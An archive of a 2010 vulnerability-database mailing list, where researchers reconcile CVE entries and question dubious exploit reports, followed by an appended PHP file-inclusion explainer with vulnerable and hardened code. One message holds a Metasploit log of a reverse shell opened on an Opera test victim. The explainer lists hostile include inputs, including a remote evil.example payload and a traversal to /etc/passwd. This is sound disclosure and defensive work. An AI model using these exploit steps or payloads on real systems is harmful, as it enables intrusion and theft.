From jericho at attrition.org Mon Jul 5 14:04:07 2010
From: jericho at attrition.org (security curmudgeon)
Date: Mon, 5 Jul 2010 14:04:07 -0500 (CDT)
Subject: [VIM] ZDI-10-115: Adobe Flash Player AVM newFrameState Integer Overflow Remote Code Execution Vulnerability

Hi ZDI,

On Fri, 25 Jun 2010, ZDI Disclosures wrote:

: ZDI-10-115: Adobe Flash Player AVM newFrameState Integer Overflow Remote Code Execution Vulnerability
: http://www.zerodayinitiative.com/advisories/ZDI-10-115
: -- CVE ID:
: CVE-2010-2160

ZDI-10-114 shares this CVE, and the CVE entry only references the getouterscope method:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2160

Can you confirm the newFrameState issue (ZDI-10-115) shares the same CVE?

Thanks,

Brian
OSVDB.org


From coley at linus.mitre.org Tue Jul 6 11:38:35 2010
From: coley at linus.mitre.org (Steven M. Christey)
Date: Tue, 6 Jul 2010 12:38:35 -0400 (EDT)
Subject: [VIM] tomatoCMS - dupe or not?

alleged rediscovery by HTBridge here:

http://www.securityfocus.com/archive/1/512068/100/0/threaded

claim is "q" parameter in index.php, in 2.0.6.

Jericho claims dupe with original Secunia discovery here:

http://www.securityfocus.com/archive/1/archive/1/512189/100/0/threaded

but that issue, CVE-2010-1994, is the PATH_INFO in index.php, claimed to be fixed in 2.0.5.

I suspect these are distinct vectors and vulns - Secunia?

- Steve


From zdi-disclosures at tippingpoint.com Tue Jul 6 15:54:41 2010
From: zdi-disclosures at tippingpoint.com (ZDI Disclosures)
Date: Tue, 6 Jul 2010 15:54:41 -0500
Subject: [VIM] ZDI-10-115: Adobe Flash Player AVM newFrameState Integer Overflow Remote Code Execution Vulnerability

Hi Brian,

I can confirm and it does share the CVE ID, as provided to us by the vendor.

Best,
Kate

-----Original Message-----
From: security curmudgeon [mailto:jericho at attrition.org]
Sent: Monday, July 05, 2010 2:04 PM
To: ZDI Disclosures
Cc: vim at attrition.org
Subject: Re: ZDI-10-115: Adobe Flash Player AVM newFrameState Integer Overflow Remote Code Execution Vulnerability

Hi ZDI,

On Fri, 25 Jun 2010, ZDI Disclosures wrote:

: ZDI-10-115: Adobe Flash Player AVM newFrameState Integer Overflow Remote Code Execution Vulnerability
: http://www.zerodayinitiative.com/advisories/ZDI-10-115
: -- CVE ID:
: CVE-2010-2160

ZDI-10-114 shares this CVE, and the CVE entry only references the getouterscope method:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2160

Can you confirm the newFrameState issue (ZDI-10-115) shares the same CVE?

Thanks,

Brian
OSVDB.org


From theall at tenablesecurity.com Tue Jul 6 20:31:34 2010
From: theall at tenablesecurity.com (George A. Theall)
Date: Tue, 6 Jul 2010 21:31:34 -0400
Subject: [VIM] PsNews v1.3 SQL Injection Vulnerability

Exploit DB 14251 / Bugtraq 41410 concern SQL injection vulnerabilities in something called PsNews. Both list the 'ndetail.php' and 'print.php' scripts as affected and point to a SourceForge project page. Yet if you go to that project page, you see it's an ASP app (e.g., "ASP based Content Management System"). And if you download version 1.3, which is supposed to be affected, you see neither script is included. Not even if you ignore the discrepancy in the file type.

So, is it a different app that's affected? Or just a bogus report?

George
--
theall at tenablesecurity.com


From che at secunia.com Wed Jul 7 10:27:12 2010
From: che at secunia.com (Carsten H. Eiram)
Date: Wed, 07 Jul 2010 17:27:12 +0200
Subject: [VIM] tomatoCMS - dupe or not?
Message-ID: <1278516432.18695.930.camel@TS-HQ-4>

I had one of my guys look into this and retest versions 2.0.5 and 2.0.6. The conclusion is that:

a) This is a dupe of http://secunia.com/secunia_research/2010-56 as spotted by Jericho.

b) The report from HTBridge stating that versions 2.0.6 and prior are affected is incorrect. Version 2.0.5 does fix the vulnerability and it has not been reintroduced in version 2.0.6. Perhaps HTBridge tested against the vendor demo site, which runs the vulnerable version 2.0.4, thinking it was the latest version?

/Carsten

On Tue, 2010-07-06 at 12:38 -0400, Steven M. Christey wrote:
> alleged rediscovery by HTBridge here:
>
> http://www.securityfocus.com/archive/1/512068/100/0/threaded
>
> claim is "q" parameter in index.php, in 2.0.6.
>
> Jericho claims dupe with original Secunia discovery here:
>
> http://www.securityfocus.com/archive/1/archive/1/512189/100/0/threaded
>
> but that issue, CVE-2010-1994, is the PATH_INFO in index.php, claimed to
> be fixed in 2.0.5.
>
> I suspect these are distinct vectors and vulns - Secunia?
>
> - Steve
>

--
Med venlig hilsen / Kind regards

Carsten H. Eiram
Chief Security Specialist

Secunia
Weidekampsgade 14 A
DK-2300 Copenhagen S
Denmark

Phone +45 7020 5144
Fax +45 7020 5145


From jericho at attrition.org Thu Jul 8 18:32:12 2010
From: jericho at attrition.org (security curmudgeon)
Date: Thu, 8 Jul 2010 18:32:12 -0500 (CDT)
Subject: [VIM] old PHP issues

Digging through old links to sort, found this again:

http://www.cr0w.ru/2009/03/self-contained-file-include-in-php-520.html

Would these be implementation specific, or flaws in PHP itself?


From ascii at katamail.com Fri Jul 9 01:36:35 2010
From: ascii at katamail.com (ascii)
Date: Fri, 09 Jul 2010 08:36:35 +0200
Subject: [VIM] old PHP issues
Message-ID: <4C36C373.1030006@katamail.com>

On 07/09/2010 01:32 AM, security curmudgeon wrote:
> Digging through old links to sort, found this again:
> http://www.cr0w.ru/2009/03/self-contained-file-include-in-php-520.html
> Would these be implementation specific, or flaws in PHP itself?

It's a feature of PHP, known and exploited from many years, well before 2009.

PHP file functions support different URI handlers; that's why RFI over HTTP was so common in the first place (forgetting about absolutely ugly and vulnerable PHP code written by first-time developers).

Have a nice day,
Francesco `ascii` Ongaro
http://www.ush.it/


From jericho at attrition.org Fri Jul 9 02:00:20 2010
From: jericho at attrition.org (security curmudgeon)
Date: Fri, 9 Jul 2010 02:00:20 -0500 (CDT)
Subject: [VIM] old PHP issues
In-Reply-To: <4C36C373.1030006@katamail.com>
References: <4C36C373.1030006@katamail.com>

On Fri, 9 Jul 2010, ascii wrote:

: On 07/09/2010 01:32 AM, security curmudgeon wrote:
: > Digging through old links to sort, found this again:
: > http://www.cr0w.ru/2009/03/self-contained-file-include-in-php-520.html
: > Would these be implementation specific, or flaws in PHP itself?
:
: It's a feature of PHP, known and exploited from many years, well before
: 2009.

"feature" of PHP, "exploited from many years" =)

Wording implies it is known functionality of PHP, but may be considered an exploit by others. PHP also has a history of downplaying or ignoring vulnerabilities, making this product specifically questionable as to the difference.

Any clarification?

Thanks,

Brian


From theall at tenablesecurity.com Tue Jul 13 10:16:21 2010
From: theall at tenablesecurity.com (George A. Theall)
Date: Tue, 13 Jul 2010 11:16:21 -0400
Subject: [VIM] SunSolve Links Broken?
Message-ID: <3F07B625-0AB3-4EC2-9A92-3B9C52F038C2@tenablesecurity.com>

Maybe this is old news for you VDB folks, but I just noticed that links to Sun Alerts of the form http://sunsolve.sun.com/search/document.do?assetkey=1-2X-XXXXXX return a 404 error page. That page also notes that documents of the form 1-6X-XXXXXX will no longer be accessible after December 2010.

George
--
theall at tenablesecurity.com


From coley at linus.mitre.org Tue Jul 13 11:41:40 2010
From: coley at linus.mitre.org (Steven M. Christey)
Date: Tue, 13 Jul 2010 12:41:40 -0400 (EDT)
Subject: [VIM] SunSolve Links Broken?
In-Reply-To: <3F07B625-0AB3-4EC2-9A92-3B9C52F038C2@tenablesecurity.com>
References: <3F07B625-0AB3-4EC2-9A92-3B9C52F038C2@tenablesecurity.com>

I've had various difficulties that I've informed Oracle about but didn't notice the broken assetkey=1-26-XXXXXX-1 problems. I'll pass this on to them as well.

- Steve


From dm at securityfocus.com Fri Jul 23 11:44:23 2010
From: dm at securityfocus.com (dm at securityfocus.com)
Date: Fri, 23 Jul 2010 10:44:23 -0600
Subject: [VIM] opera_configoverwrite.rb
Message-ID: <20100723164423.GA20600@securityfocus.com>

Hey,

Does anybody (CVE, OSVDB, etc.) have a record for this vulnerability?

https://www.metasploit.com/redmine/projects/framework/repository/revisions/7724/entry/modules/exploits/multi/browser/opera_configoverwrite.rb

I can't find one in our VDB -- at least nothing specific enough to pin it to this exploit.

It's been exploited in the wild by a few exploit packs, namely CRiMEPACK.

I talked to someone at Opera and they haven't been able to reproduce it in 9.x versions (which it is supposed to affect). They're not sure exactly when it was fixed.

--
Dave McKinney
Symantec
keyID: E461AE4E
key fingerprint = F1FC 9073 09FA F0C7 500D D7EB E985 FAF3 E461 AE4E


From steve at vitriol.net Fri Jul 23 12:33:25 2010
From: steve at vitriol.net (Steve Tornio)
Date: Fri, 23 Jul 2010 12:33:25 -0500
Subject: [VIM] opera_configoverwrite.rb
In-Reply-To: <20100723164423.GA20600@securityfocus.com>
References: <20100723164423.GA20600@securityfocus.com>

On Fri, Jul 23, 2010 at 11:44 AM, wrote:
> Does anybody (CVE, OSVDB, etc.) have a record for this vulnerability?
>

egyp7 asked me about this yesterday, because he was trying to track down refs for it. All I could find was the metasploit module and the corresponding exploit-db (9945).

I created OSVDB 66472 to start collecting information on it, but hadn't found any more than what's in the metasploit module (current version - https://www.metasploit.com/redmine/projects/framework/repository/revisions/9906/entry/modules/exploits/multi/browser/opera_configoverwrite.rb )

>
> I can't find one in our VDB -- at least nothing specific enough to pin
> it to this exploit.
>
> It's been exploited in the wild by a few exploit packs, namely
> CRiMEPACK.
>
> I talked to someone at Opera and they haven't been able to reproduce
> it in 9.x versions (which it is supposed to affect). They're not sure
> exactly when it was fixed.

He couldn't remember if the issue was fixed in 9.10, or included 9.10, and has since deleted the VM he was testing with. Since he wrote the module as <= 9.10, I went with 9.10 as the last vulnerable version. He does remember that the issue was fixed in a later release, whether it's 9.10 or 9.20. He did get the exploit from mpack.

Thanks,
Steve


From jkouns at opensecurityfoundation.org Mon Jul 26 00:17:39 2010
From: jkouns at opensecurityfoundation.org (Jake Kouns)
Date: Mon, 26 Jul 2010 01:17:39 -0400
Subject: [VIM] Annual VIM Gathering at Defcon

Another year............ and the same question.... Should we have another gathering and if so where?

If anyone is up for it let me know. At this point I am thinking a Friday lunch meeting @ Peppermill.

--Jake


From amanion at cert.org Mon Jul 26 14:38:31 2010
From: amanion at cert.org (Art Manion)
Date: Mon, 26 Jul 2010 15:38:31 -0400
Subject: [VIM] Annual VIM Gathering at Defcon
Message-ID: <4C4DE437.50109@cert.org>

On 2010-07-26 01:17, Jake Kouns wrote:
> Another year............ and the same question.... Should we have
> another gathering and if so where?
> If anyone is up for it let me know. At this point I am thinking a
> Friday lunch meeting @ Peppermill.

I'm up for it, kinda sentimental about shadow lounge some evening, but almost any time/date works for us.

- Art


From theall at tenable.com Mon Jul 26 21:04:02 2010
From: theall at tenable.com (George A. Theall)
Date: Mon, 26 Jul 2010 22:04:02 -0400
Subject: [VIM] 4images v1.7.7 Remote Command Execution Vulnerability
Message-ID: <02B2A41B-F460-441D-ADB9-83377F364030@tenable.com>

Exploit DB #14478 looks bogus -- here's a slightly larger snippet of the affected file from version 1.7.7:

----- snip, snip, snip -----


References: <02B2A41B-F460-441D-ADB9-83377F364030@tenable.com>
Message-ID: <57FE962A-B0E1-4893-A381-2B82264D2D96@tenable.com>

On Jul 26, 2010, at 10:04 PM, George A. Theall wrote:
> Exploit DB #14478 looks bogus -- here's a slightly larger snippet of
> the affected file from version 1.7.7:

And it looks like Bugtraq ID 41974 was recently created to cover this "issue".

George
--
theall at tenablesecurity.com


From steve at vitriol.net Tue Jul 27 07:30:02 2010
From: steve at vitriol.net (Steve Tornio)
Date: Tue, 27 Jul 2010 07:30:02 -0500
Subject: [VIM] opera_configoverwrite.rb
In-Reply-To: <20100723164423.GA20600@securityfocus.com>
References: <20100723164423.GA20600@securityfocus.com>

On Fri, Jul 23, 2010 at 11:44 AM, wrote:
> I talked to someone at Opera and they haven't been able to reproduce
> it in 9.x versions (which it is supposed to affect). They're not sure
> exactly when it was fixed.
>

egypt set up an environment to verify this. It is exploitable on Fedora Core 5, Opera 9.10.

http://www.pastebin.ca/1909252

msf exploit(opera_configoverwrite) > set ENCODER cmd/generic_sh
ENCODER => cmd/generic_sh
msf exploit(opera_configoverwrite) > rexploit
[*] Stopping existing job...
[*] Server stopped.
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.99.1:4444
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.2.100:8080/
[*] Server started.
msf exploit(opera_configoverwrite) >
[*] Got request /
[*] Sending Opera 9 Configuration Overwrite to 192.168.99.134:56071...
[*] Done with request /
[*] Got request /favicon.ico
[*] 404ing request for /favicon.ico
[*] Command shell session 1 opened (192.168.99.1:4444 -> 192.168.99.134:59644) at 2010-07-27 06:21:11 -0600

msf exploit(opera_configoverwrite) > sessions -i 1
[*] Starting interaction with 1...

id
uid=500(vulnerable) gid=500(vulnerable) groups=500(vulnerable) context=user_u:system_r:unconfined_t
ps
  PID TTY          TIME CMD
 3097 pts/1    00:00:00 bash
10378 pts/1    00:00:10 opera
10387 pts/1    00:00:00 operapluginwrap
10449 pts/1    00:00:00 sh
10451 pts/1    00:00:00 sh
10452 pts/1    00:00:00 sh
10458 pts/1    00:00:00 ps


From coley at linus.mitre.org Tue Jul 27 14:00:34 2010
From: coley at linus.mitre.org (Steven M. Christey)
Date: Tue, 27 Jul 2010 15:00:34 -0400 (EDT)
Subject: [VIM] Annual VIM Gathering at Defcon

On Mon, 26 Jul 2010, Jake Kouns wrote:

> Another year............ and the same question.... Should we have
> another gathering and if so where?
> If anyone is up for it let me know. At this point I am thinking a
> Friday lunch meeting @ Peppermill.

Probably works for me.

Art, not sure if you have my cell #, I'll email you separately.

Certain unnamed Danes have decided that they don't like us anymore, so we'll have to have Jaeger-bombs without them.

- Steve


From coley at linus.mitre.org Tue Jul 27 15:45:12 2010
From: coley at linus.mitre.org (Steven M. Christey)
Date: Tue, 27 Jul 2010 16:45:12 -0400 (EDT)
Subject: [VIM] CVE number confusion in HP OV NNM products

All,

Due to an accidental switch of CVEs by VUPEN in their two advisories on OV NNM, there's a little bit of confusion about CVE numbers. I've clarified things with both VUPEN and HP.

CVE-2010-2703 is for the ov.dll vector, found by both ZDI and VUPEN, listed in HPSBMA02557 and SSRT100025. VUPEN's ov.dll advisory inadvertently used the wrong CVE.

CVE-2010-2704 is for the VUPEN-discovered nnmrptconfig.exe vector, covered in HPSBMA02558 / SSRT100158 (also SSRT010158, presumably a typo in the HP advisory ID).

- Steve


From che at secunia.com Wed Jul 28 07:15:10 2010
From: che at secunia.com (Carsten H. Eiram)
Date: Wed, 28 Jul 2010 14:15:10 +0200
Subject: [VIM] Annual VIM Gathering at Defcon
Message-ID: <1280319310.8093.426.camel@TS-HQ-2>

On Tue, 2010-07-27 at 15:00 -0400, Steven M. Christey wrote:
> On Mon, 26 Jul 2010, Jake Kouns wrote:
>
> > Another year............ and the same question.... Should we have
> > another gathering and if so where?
> > If anyone is up for it let me know. At this point I am thinking a
> > Friday lunch meeting @ Peppermill.
>
> Probably works for me.
>
> Art, not sure if you have my cell #, I'll email you separately.
>
> Certain unnamed Danes have decided that they don't like us anymore, so
> we'll have to have Jaeger-bombs without them.

If those unnamed Danes still don't like you next year (though I'm sure they will as you're all lovable chaps), then let me know and I'll come by and keep you and the Jägerbombs company. However, you should probably stay away from them this year - shooting Jägerbombs without Danish supervision is not safe.

/Carsten

--
Med venlig hilsen / Kind regards

Carsten H. Eiram
Chief Security Specialist

Secunia
Weidekampsgade 14 A
DK-2300 Copenhagen S
Denmark

Phone +45 7020 5144
Fax +45 7020 5145
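Returning to the "old PHP issues" thread above: ascii's point is that PHP's file functions, include() among them, accept URI wrappers, so an include whose target comes from the request can be fed a data:// or php://input payload and needs no remote host at all (the "self-contained" case in the cr0w.ru post) whenever allow_url_include is on. The block below is an added example written for this page; it is not code from the thread, from the cr0w.ru post or from any real application. It shows a toy page loader in its vulnerable form beside a hardened one. The function and constant names, the pages/ directory, the evil.example host and the probe strings are all assumptions made up for the illustration.

```php
<?php
declare(strict_types=1);

// Added example for this page: not code from the VIM thread, the cr0w.ru
// post or any real application. All names and paths here are assumptions.

// Vulnerable: the include() target is taken straight from the request.
// Because include() goes through PHP's stream wrappers, with
// allow_url_include=On each of these requests executes attacker-chosen code:
//   ?page=http://evil.example/shell.txt                       (classic RFI)
//   ?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+   (no remote host)
//   ?page=php://input                                         (POST body as PHP)
// With allow_url_include=Off those wrappers are refused, but a local
// traversal such as ?page=../../../../etc/passwd still works, so the ini
// setting alone does not fix the bug.
function render_page_vulnerable(string $page): void
{
    include $page;
}

// Hardened: map a short identifier to a file under one fixed directory
// (assumed layout: a pages/ directory next to this script) and refuse
// everything else. The request never reaches a wrapper or a path.
const PAGE_DIR = __DIR__ . '/pages';
const PAGES = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
];

// Returns the absolute path of a known page, or null for anything else.
function resolve_page(string $page): ?string
{
    if (!isset(PAGES[$page])) {
        return null;                    // unknown identifier: reject, never guess
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$page]);
    // realpath() resolves symlinks and "..", so a prefix check on its result
    // guarantees the file really sits inside PAGE_DIR.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function render_page_hardened(string $page): void
{
    $path = resolve_page($page);
    if ($path === null) {
        http_response_code(404);
        echo "no such page\n";
        return;
    }
    include $path;
}

// Self-check with constructed probe strings: every wrapper and traversal
// form is rejected by the allowlist before any file or wrapper is touched.
$probes = [
    'home',
    '../../../../etc/passwd',
    'http://evil.example/shell.txt',
    'data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+',
    'php://input',
];
foreach ($probes as $probe) {
    printf("%-55s => %s\n", $probe, resolve_page($probe) ?? 'rejected');
}
```

Run it from the command line with php and the resolver reports each wrapper and traversal probe as rejected; 'home' resolves only if pages/home.php exists next to the script. Turning allow_url_include off is still worth doing, but it only closes the wrapper forms; the allowlist is what closes the local ones, and it is the difference between a configuration knob and a fix in the application.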